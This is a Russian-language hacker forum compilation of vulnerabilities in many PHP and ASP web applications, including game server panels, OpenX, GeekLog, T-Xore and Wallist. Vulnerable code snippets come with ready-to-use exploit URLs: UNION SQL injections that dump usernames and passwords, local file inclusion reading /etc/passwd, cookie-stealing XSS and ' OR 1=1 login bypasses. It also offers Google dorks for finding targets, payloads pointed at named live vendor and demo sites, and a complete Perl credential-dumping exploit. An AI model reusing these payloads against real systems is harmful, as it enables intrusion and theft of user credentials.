Энциклопедия уязвимых скриптов

&
p.w.p. author & author

charname_change.php:

Code:

...
$guid = addslashes($_GET["guid"]);
...
$sql = "SELECT guid, account, CAST(SUBSTRING_INDEX(SUBSTRING_INDEX(`data`, ' ', 1462), ' ', -1) AS UNSIGNED) AS `money`, name FROM characters WHERE guid=$guid AND account=$id";
...

mod spora author

guild.php:

Code:

...
$_GET['page'] = !isset($_GET['page'])?'guilds':$_GET['page'];
...
include("./module/".$_GET['page'].".php");
...

wow-ultimate author

gilds.php:

Code:

...
if (@$_GET['guid']) {
$guildid = addslashes($_GET['guid']);
...
$query_leader_name = $characters_db->query("SELECT * FROM `characters` WHERE `guid` IN (SELECT `guid` FROM `guild_member` WHERE `guildid`=".$guildid.") ORDER by `name`");
...

block-center.php:

Code:

<?php
if (!$menu = &$_GET['page']) 
$menu=$main_page;
print "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
<td width=\"100%\" valign=\"top\" align=\"center\" >";
require_once("modules/$menu.php");
print "</td></tr></table>";
?>

MiniManager author
дофига скулей , cвн

 

FGS_Studio cms
sql inj в параметре content_id
например на сайте производителя:

исходники найти не удалось - колонки угадывались методом научного тыка).
dork:

 

FuzzyLime CMS

FuzzyLime CMS

SQL Иньекция:

Code:

http://site/shop_showcat.php?='%20UNION%20ALL%20SELECT%201,2,3,4,5,6,concat(username,':',passwrd)%20from%20users/*

Локальный Инклуд:
Файл:index.php :
Уязвимый кусок кода:

Code:

<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">

Code:

http://site/index.php?Root=../../../../../../etc/password

Code:

http://index.php?Path=../../../../../../etc/password

XSS:

Code:

http://site/login.php?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 

yBlog



Локальный Инклуд:


Файл: pc.lib.php
Кусок уязвимого кода:

Code:

 if (!isset($g_pc_lib_dir))
    $g_pc_lib_dir = "lib";

...

  $g_pc_extension = "php";

  if (!defined("PCLERROR_LIB"))
  {
    include("data/inc/$g_pc_lib_dir/pclerror.lib.$g_pcltar_extension");
  }
  if (!defined("PCLTRACE_LIB"))
  {
    include("data/inc/$g_pc_lib_dir/pcltrace.lib.$g_pcltar_extension");

Code:

http://site/inc/lib/pc.lib.php?g_pc_lib_dir=../../../../../../../../../../../../../etc/passwd%00

SQL Иньекция:

Code:

http://site/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--

XSS Иньекция:

Code:

http://site/yblog/user.php?n=<script>alert(/xss/)</script>

 

webspell cms 4.01.02 dev

articles.php:

Code:

...
  $title = $_POST['title'];
  $message = $_POST['message'];
  $link1 = $_POST['link1'];
  $url1 = $_POST['url1'];
  $window1 = $_POST['window1'];
  $link2 = $_POST['link2'];
  $url2 = $_POST['url2'];
  $window2 = $_POST['window2'];
  $link3 = $_POST['link3'];
  $url3 = $_POST['url3'];
  $window3 = $_POST['window3'];
  $link4 = $_POST['link4'];
  $url4 = $_POST['url4'];
  $window4 = $_POST['window4'];
[B]  $comments = $_POST['comments'];
  $articlesID = $_POST['articlesID'];[/B]

  safe_query("UPDATE ".PREFIX."articles SET 
     title='".mysql_escape_string($title)."',
     content='".mysql_escape_string($message)."',
     link1='".mysql_escape_string($link1)."',
     url1='".mysql_escape_string($url1)."',
     window1='".mysql_escape_string($window1)."',
     link2='".mysql_escape_string($link2)."',
     url2='".mysql_escape_string($url2)."',
     window2='".mysql_escape_string($window2)."',
     link3='".mysql_escape_string($link3)."',
     url3='".mysql_escape_string($url3)."',
     window3='".mysql_escape_string($window3)."',
     link4='".mysql_escape_string($link4)."',
     url4='".mysql_escape_string($url4)."',
     window4='".mysql_escape_string($window4)."',
     saved='1', [B]comments='$comments' WHERE articlesID='$articlesID'");[/B]

whoisonline.php:

dork:

шелл заливается либо через squads:

либо через шаблоны

 

Уязвимости различных CMS и скриптов

Создал эту тему, дабы не плодить кучу тем с найдеными мной (либо не мой) уязвимостями в недоCMS и прочих интересных продуктах! =)

Сайт производитель: http://wdt.org.ru
Продукт: DPortal
Версия: 1.1
(wap-CMS)

Локальное чтение файлов:

XSS (Повсюду):

Сайт производитель: http://steadycms.ru/
Продукт: Steady-CmS
Версия: 5.5
(wap-CMS)

SQL-inj

По всему скрипту не фильтруется User-agent.
Примерный эксплойт:

Сайт производитель: http://linkorcms.ru/
Продукт: LinkorCMS
Версия: 1.2

XSS

Сайт производитель: www.phpmyadmin.net/
Продукт: phpMyAdmin 2.6.1
Версия: 2.6.1

Расскрытие путей

 

Обзор уязвимостей OpenX 2.6.3
Раскрытие путей:

Code:

/openx/www/api/v1/common/BaseAdvertiserService.php
/openx/www/api/v1/common/BaseAgencyService.php
/openx/www/api/v1/common/BaseBannerService.php
/openx/www/api/v1/common/BaseCampaignService.php
/openx/www/api/v1/common/BaseLogonService.php
/openx/www/api/v1/common/BasePublisherService.php
/openx/www/api/v1/common/BaseServiceImpl.php
/openx/www/api/v1/common/BaseUserService.php
/openx/www/api/v1/common/BaseZoneService.php
/openx/www/api/v1/common/XmlRpcUtils.php
/openx/www/api/v1/xmlrpc/AdvertiserServiceImpl.php
/openx/www/api/v1/xmlrpc/AgencyServiceImpl.php
/openx/www/api/v1/xmlrpc/BannerServiceImpl.php
/openx/www/api/v1/xmlrpc/CampaignServiceImpl.php
/openx/www/api/v1/xmlrpc/LogonServiceImpl.php
/openx/www/api/v1/xmlrpc/PublisherServiceImpl.php
/openx/www/api/v1/xmlrpc/UserServiceImpl.php
/openx/www/api/v1/xmlrpc/ZoneServiceImpl.php
/openx/www/admin/config.php
/openx/plugins/3rdPartyServers/3rdPartyServers.php
/openx/plugins/3rdPartyServers/adtech/adtech.plugin.php
/openx/plugins/3rdPartyServers/atlas/atlas.plugin.php
/openx/plugins/3rdPartyServers/bluestreak/bluestreak.plugin.php
/openx/plugins/3rdPartyServers/cpx/cpx.plugin.php
/openx/plugins/3rdPartyServers/doubleclick/doubleclick.plugin.php
/openx/plugins/3rdPartyServers/eyeblaster/eyeblaster.plugin.php
/openx/plugins/3rdPartyServers/falk/falk.plugin.php
/openx/plugins/3rdPartyServers/google/google.plugin.php
/openx/plugins/3rdPartyServers/kontera/kontera.plugin.php
/openx/plugins/3rdPartyServers/max/max.plugin.php
/openx/plugins/3rdPartyServers/mediaplex/mediaplex.plugin.php
/openx/plugins/3rdPartyServers/tangozebra/tangozebra.plugin.php
/openx/plugins/3rdPartyServers/tradedoubler/tradedoubler.plugin.php
/openx/plugins/3rdPartyServers/ypn/ypn.plugin.php
/openx/plugins/Maintenance/Maintenance.php
/openx/plugins/authentication/Authentication.php
/openx/plugins/authentication/cas/cas.plugin.php
/openx/plugins/authentication/cas/OaCasClient.php
/openx/plugins/authentication/cas/Controller/ConfirmAccount.php
/openx/plugins/authentication/cas/Central/RpcMapper.php
/openx/plugins/authentication/cas/Central/Cas.php
/openx/plugins/authentication/cas/CAS/PGTStorage/pgt-db.php
/openx/plugins/authentication/cas/CAS/PGTStorage/pgt-file.php
/openx/plugins/authentication/cas/CAS/languages/english.php
/openx/plugins/authentication/cas/CAS/languages/french.php
/openx/plugins/authentication/cas/CAS/languages/german.php
/openx/plugins/authentication/cas/CAS/languages/greek.php
/openx/plugins/authentication/cas/CAS/languages/japanese.php
/openx/plugins/authentication/internal/internal.plugin.php
/openx/plugins/channelDerivation/ChannelDerivation.php
/openx/plugins/channelDerivation/mysql/mysql.plugin.php
/openx/plugins/channelDerivation/xmlrpc/xmlrpc.plugin.php
/openx/plugins/deliveryLimitations/Client/Browser.delivery.php
/openx/plugins/deliveryLimitations/Client/Browser.plugin.php
/openx/plugins/deliveryLimitations/Client/Domain.delivery.php
/openx/plugins/deliveryLimitations/Client/Domain.plugin.php
/openx/plugins/deliveryLimitations/Client/Ip.delivery.php
/openx/plugins/deliveryLimitations/Client/Ip.plugin.php
/openx/plugins/deliveryLimitations/Client/Language.delivery.php
/openx/plugins/deliveryLimitations/Client/Language.plugin.php
/openx/plugins/deliveryLimitations/Client/Os.delivery.php
/openx/plugins/deliveryLimitations/Client/Os.plugin.php
/openx/plugins/deliveryLimitations/Client/Useragent.delivery.php
/openx/plugins/deliveryLimitations/Client/Useragent.plugin.php
/openx/plugins/deliveryLimitations/DeliveryLimitations.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsArrayData.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsCommaSeparatedData.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsResourceData.php
/openx/plugins/deliveryLimitations/Geo/Areacode.delivery.php
/openx/plugins/deliveryLimitations/Geo/Areacode.plugin.php
/openx/plugins/deliveryLimitations/Geo/City.delivery.php
/openx/plugins/deliveryLimitations/Geo/Organisation.delivery.php
/openx/plugins/statisticsFieldsTargeting/statisticsFieldsTargeting.php
/openx/plugins/statisticsFieldsTargeting/default/default.plugin.php
/openx/plugins/statisticsFieldsDelivery/statisticsFieldsDelivery.php
/openx/plugins/statisticsFieldsDelivery/default/default.plugin.php
/openx/plugins/statisticsFieldsDelivery/affiliates/affiliates.plugin.php
/openx/plugins/reports/admin/breakdown.plugin.php
/openx/plugins/reports/Reports.php

Узнаем версию:

SQL Injection (Нужны права администратора):

Code:

/openx/www/admin/campaign-banners.php?clientid=1)+union+select+1,2,concat(us ername,0x3a,password),4,5+from+ox_users/*&campaignid=1

Code:

/openx/www/admin/campaign-edit.php?clientid=3)+union+select+1,2,concat(usern ame,0x3a,password),4,5+from+ox_users/*&campaignid=5

Code:

/openx/www/admin/banner-acl.php?clientid=1&campaignid=3&bannerid=1)+union+select+1,2,concat(username,0x3a, password),4,5,6+from+ox_users/*

SQL Инъекции валидны только тогда когда добавлено хотя бы одна учетная запись.

Активная XSS
При добавлении новой учетной записи уязвимые поля: "Имя" и "Контакты".
При добавлении нового клиента узвимы поля: "Имя", "Контакт" и "Комментарии".
При добавлении нового сайта уязвимы поля: "URL веб-сайта", "Имя" и "Контакт"
При добавлении новой зоны уязвимы поля: "Описание" и "Комментарий"
При добавлении нового канала таргетинга уязвимы поля: "Имя", "Описание" и "Комментарии".
При добавлении нового трекера уязвимы поля: "Имя" и "Описание"
Фильтрации нет вообще.

Пасивная XSS

Code:

/openx/www/admin/tracker-append.php?clientid=[CODE_XSS]&trackerid=1%27
/openx/www/admin/advertiser-trackers.php?clientid=[CODE_XSS]

Бояню от сюда: http://209.85.129.132/search?q=cache:yPQ62-iGZbcJ:https://forum.antichat.ru/showthread.php%3Fp%3D1038739+antichat.ru+openx

 

производитель: kan-studio.ru
продукт Kandidat CMS v.1.3.1
pXSS
всё работает при register_globals=on

HTML:

http://kandidat/admin/login.php?contentcenter=123'%22%3E%3Cscript%3Ealert(1)%3C/script%3E

в исходнике проверяется лишь наличие куков, а на содержание пофик

HTML:

get http://kandidat/media/upload.php?contentcenter=<script>alert(1)</script> HTTP/1.0
Host: kandidat
Cookie: KNcookies=123;
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Proxy-Connection: Keep-Alive

 

iPHPortal 1.37_02

Пасивная XSS

Code:

http://site/user/?back_url=/" [xss code]
http://site/user/?action=remind&back_url=/" [xss code]

Раскрытие путей

Code:

http://site/forums/?action=forum_add_message&forum_id[]=
http://site/include/func/db/common_db.inc.php?site=[]
http://site/include/func/db/split_sql_file.inc.php?site=[]

SQL-injection (нужны права админа)

Code:

http://site/admin/index.php?admin_url=rubric_edit.php?rubric_id=173+union+select+1,2,3,concat_ws(0x3a,user_login,user_password)+from+user+limit+0,1/*

Автор: iSee

 

PHPSlideshow
XSS:

Code:

http://site/slideshow/index.php?directory=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Code:

http://site/slideshow/index.php?directory=%3Cscript%3Edocument.location%3D%27http://forum.antichat.rua%27%3C/script%3E

2 часа ночи,пока все

 

Уязвимости T-Xore [торрент портал]

Уязвимости T-Xore [торрент портал]​

Project : T-Xore (http://bit-torrent.net.ru/7-skript-torrent-indeksatora-giganova.org.html)
Found by: Dimi4
Date : 03.02.09
Auth bypass

login.php
Bug func:​

PHP:

if (isset($_POST['username'])&&isset($_POST['password'])){
    $result = mysql_query("SELECT * FROM users WHERE username = '".$_POST['username']."' and password = '".md5($_POST['password'])."' LIMIT 1") or die (mysql_error());
    if (mysql_num_rows($result) == 0){
        stheader('Login Failed');
        login_form($_POST['username'],'Username or password incorrect.');
        footer();
        exit();
    }

Username: name' OR 1=1/*
Password: anything

Sql-inj

usertorrent.php
Bug func:​

PHP:

$result2 = mysql_query("SELECT * FROM torrents LEFT JOIN categories ON torrents.subcat = categories.subid WHERE posted_by='".strtolower($_GET['usuario'])."'") or die (mysql_error());

Code:

usertorrent.php?usuario=giga'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),0x71),0x71),14,15,16,17,18,19,20,21,22+from+users/*

Ех..дам там полной скулей.. ну нафиг

 

GeekLog

Автор: faza02
Сайт производителя: geeklog.net

GeekLog v1.3.7sr1

sql-inj:

Code:

/filemgmt/singlefile.php?lid=-133+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*

etc..

пассы хэшированы в md5.

таблицы юзеров: gl_user
колонки: username, passwd

 

Автор: [JavaScript]
Сайт производителя: geeklog.net
Респекты: faza02 за показание двига.
Версии выше GeekLog v1.3.7sr1

Passive XSS:

Code:

/filemgmt/singlefile.php?lid="><script>alert(/xss/)</script><!--

 

Профессиональная Open Source CMS
Сайт производителя: www.4site.ru
SQL injection в модуле portfolio:

Code:

http://4site.ru/portfolio/index.shtml?s=5&i=-26+union+select+1,2,3,version(),5,6,7,8,9--

Code:

http://4site.ru/portfolio/index.shtml?s=-12+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--

SQL injection в модуле FAQ:

Code:

http://4site.ru/faq/index.shtml?th=-5+union+select+1,2,version(),4,5--

После нахождения мной этих уязвимостей я наткнулся на сайт с почти аналогичным обзором багов на этом ресурсе... линк
---------------------------------------------------
The End!

 

Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit​

Code:

#!/usr/bin/perl -w
#===========================================================
# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
#===========================================================
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /           
#  / XXXXXX /
# (________(             
#  `------'
#
#AUTHOR : CWH Underground
#DATE : 29 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : Lito Lite CMS
#DOWNLOAD    : http://www.lovedesigner.net/files/download/lito_lite.zip
######################################################
#
#Note: magic_quotes_gpc = off
#
#######################################################################################
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################


use LWP::UserAgent;
use HTTP::Request;

if ($#ARGV+1 != 2)
{
   print "\n==============================================\n";
   print "    Lito Lite Remote SQL Injection Exploit   \n";
   print "                                              \n";
   print "        Discovered By CWH Underground         \n";
   print "==============================================\n";
   print "                                              \n";
   print "  ,--^----------,--------,-----,-------^--,   \n";
   print "  | |||||||||   `--------'     |          O	\n";
   print "  `+---------------------------^----------|   \n";
   print "    `\_,-------, _________________________|   \n";
   print "      / XXXXXX /`|     /                      \n";
   print "     / XXXXXX /  `\   /                       \n";
   print "    / XXXXXX /\______(                        \n";
   print "   / XXXXXX /                                 \n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
   print " (________(                                   \n";
   print "  `------'                                    \n";
   print "                                              \n"; 
   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
   print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
   exit();
}

$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
$number = $ARGV[1];

print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print "\n[+]Dump Username and Password\n";

for ($start=0;$start<$number;$start++) {

$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;

if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
}
else { 
	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
	exit;
}
}

# milw0rm.com [2008-11-29]

http://www.milw0rm.com/exploits/7294

 

Max Write System​

Автор: mailbrush
Оффсайт: http://www.webwisesage.com/maxwrite/
Тип уязвимости: SQL Injection

Code:

http://www.site.com/maxwrite/diarypage.php?did=-1+{SQL Injection}

Google Dork:

Code:

allinurl: diarypage.php?did=

PS: В теме SQL Инъекции я уже выклал все, что нагуглил =)

 

Wallist v1.2 - скрипт фотогаллереи
Уязвимость нашел: Kraneg
SQL-Inj:
1. при просмотре галереи в файле files/view.inc отсутствует фильтрация или вообще что то похожее на защиту от скули =(
Уязвимый код:

PHP:

if(isset($_GET['pc']))
{
$query_pc = @mysql_query("select * from ".$separator."pod_categories where id_podcat=".$_GET['pc'].";");
if($query_pc)
{
//если запрос выполнен успешно
//Ищем категорию по данной подкатегории
$query_c= @mysql_query("select * from ".$separator."categories where id_cat=".mysql_result($query_pc,0,'id_cat').";");

if(!$query_c){show_error("Извените запрос на список категорий не выполнен, возможные причины:<li>Данного раздела не существует<li>Не доступна база данных");}
        }

        else {show_error("Извените запрос на подкатегорию не выполнен, возможные причины:<li>Данного подраздела не существует<li>Не доступна база данных");}

        }
else
{
$query_c= @mysql_query("select * from ".$separator."categories where id_cat=".$_GET['c'].";");
if(!$query_c){show_error("Извените запрос на список категорий не выполнен, возможные причины:<li>Данного раздела не существует<li>Не доступна база данных");}
        }
[....]
$cat['name']=@mysql_result($query_c,0,'name');
[....]
$p_cat['name']=@mysql_result($query_pc,0,'name');
[....]
echo "
<table width='100%'>
<tr><td width='50%'></td><td align=right>Раздел: ".$cat['name']."</td></tr>";
if (isset($p_cat)){echo "
<tr><td width='50%'></td><td align=right>Подраздел: ".$p_cat['name']."</td></tr>";
}
echo "
</table>
";

Пример использования уязвимости:

Code:

http://localhost/wallist/?action=ShowGallery&pc=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--

2.Отсутствие фильтрации в файле vote.php
Уязвимый код:

PHP:

$user=mysql_query("select ip from rating where id_im=".$_GET['id']." and ip='".$_SERVER['REMOTE_ADDR']."';");
$rows=mysql_num_rows($user);
if($rows>0)
{
 echo "<center><h3><font color=red>Вы уже участвовали в рейтинге по данной фотографии...";
}

Пример запроса:
Голосуем за какую ни будь фотографию и далее выполняем запрос

Code:

http://localhost/wallist/vote.php?action=vote&rating=12&id=[ID]+and+ASCII(lower(substring(version(),1,1)))=53--

где [ID] равен иду фотографии за которую голосовали, к примеру

Code:

 http://localhost/wallist/vote.php??action=vote&rating=12&id=5+and+ASCII(lower(substring(version(),1,1)))=53--

Если версия 5(ASCII = 53) то скрипт выведет Вы уже участвовали в рейтинге по данной фотографии... если другая то Спасибо что проголосовали за данную фотографию! я привел версию для примера...
Там же к примеру никто не ограничивает нас в выставлении балов картинке, то есть максимальные 12 балов вовсе не максимальные =). К примеру выполним:

Code:

http://localhost/wallist/vote.php?action=vote&rating=4000000&id=4

и поставится картинке с идом 4 - 4000000 балов =))
3. Опять скуль =)
Уязвимость находится в файле view_large.inc приводить код не буду почти везде он однотипный.. =\
Пример использования:

Code:

http://localhost/wallist/?action=ShowGalleryFile&id=-4+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--

XSS:
1.Активная xss в коментариях, не фильтруется поле name(files/addcom.inc)...
Уязвимый код:

PHP:

 if (!preg_match("/[0-9a-z_]+@[0-9a-z_^\.]+\.[a-z]{2,3}/i", $_GET['email']))
        {

          echo "<center><font color=red>Неверно введен е-mail. Введите e-mail
          в виде <i>".$email."</i><br><a href='?action=ShowGalleryFile&id=".$_SESSION['id_im']."&functions=AddCom' title='Вернуться к форме'>[Вернуться к форме]</a>";
          exit();
        }

$query_com=@mysql_query("insert into ".$separator."comment values('',".$_GET['id'].",'".$_GET['name']."','".$_GET['email']."','".htmlspecialchars($_GET['text'])."',NOW(),'');");

2.Пасивная в скрипте vote.php:
Уязвимый код:

HTML:

<b>Спасибо что проголосовали за данную фотографию!</b></font><font color='#0071FB' size=-1><br>
Данной фотографии вы поставили: ".$_GET['rating']."

пример:

Code:

http://localhost/wallist/vote.php?action=vote&rating=<script>alert()</script>&id=[ID]

где ID картинка за которую вы еще не голосовали...

Вобщем думаю это не все, просто это все, на что хватило меня =) стандартный префикс db_ таблица с пользователями user_name и user_password(в открытом виде) админа к сожалению там нет... он собственно в файле config.php =) так же скрипт за собой не то что не удаляет, даже не просит удалить папку install со всеми вытекающими... =\

 

Гостевая книга.
код: http://dump.ru/file/1946627

1. SQL inj
бажный код:

PHP:

$result=mysql_query("SELECT id,msg,ans,author,topic,date,host,email FROM $tb WHERE ans=".$ref." ORDER BY id desc");

не фильтруются передаваемые даные.

exploit:

Code:

http://localhost/forum/forum.php?cmd=show&id=-6+union+select+group_concat(concat_ws(0x3a,id,msg,ans,author,topic,date,host,email,url))+from+forum--

татие скули почти во всех параметрах!

2. Активная XSS.

Ну здесь уязвимы все поля...
вл любом из них вводим

Code:

"><script>alert(0x646f63756d656e742e636f6f6b6965)</script>

и видим куки)

Сильно не пинайте, знаю, что гостевая - один сплошной баг, но всеже решил опубликовать...
------------------------------------------------------------
The End!

 

emergocolab​

LFI​

Часть уязвимого кода:

Code:

 if (isset($_GET["sitecode"])) {
include ("conf/global.conf");
$_SESSION["sitecode"]=$_GET["sitecode"];
$_SESSION['sitefolder']='site';
include ("conf/".strtolower($_GET["sitecode"]).".conf");

Exp:

Code:

http://site.ru/index.php?sitecode=../../../../../../../etc/passwd%00

SQL Inj
​

Exp:

Code:

http://site.ru/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--

XSS
​

Exp:http://site.ru/?pageid=<script>alert("antichat")</script>

 

Simbas CMS 2.0​

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием default.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.officetoweb.co.uk/demo/admin/default.asp
username: r0' or ' 1=1--
Password: r0' or ' 1=1--

Демонстрация:
http://www.officetoweb.co.uk/demo/admin/default.asp


© Semu